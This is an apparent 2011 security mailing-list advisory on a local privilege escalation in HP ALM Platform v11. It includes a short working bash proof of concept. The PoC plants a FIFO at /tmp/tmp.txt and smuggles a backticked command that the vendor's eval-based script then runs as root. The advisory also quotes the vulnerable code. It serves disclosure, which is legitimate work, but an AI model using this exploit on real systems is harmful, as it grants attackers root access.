[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
0A29-11-2 : Privilege escalation vulnerability in HP Application Lifestyle Management (ALM) Platform v11
- To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: 0A29-11-2 : Privilege escalation vulnerability in HP Application Lifestyle Management (ALM) Platform v11
- From: 0a29 40 <0a2940@xxxxxxxxx>
- Date: Thu, 8 Dec 2011 11:14:59 +0000
================
Privilege escalation vulnerability in HP Application Lifestyle Management
(ALM) Platform v11
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
The HP Application Lifestyle Management configuration tool contains a
vulnerable function 'GetInstalledPackages' which is called when upgrading
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use
/tmp/tmp.txt in a similar, insecure manner.
================
Timeline:
================
30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure
================
Exploit:
================
#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt # set trap
cat /tmp/tmp.txt # blocks for victim
while [ -e /tmp/tmp.txt ]; do
cat file > /tmp/tmp.txt
sleep 2
done
rm file
--
================
Details:
================
e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):
---
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'
pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt
---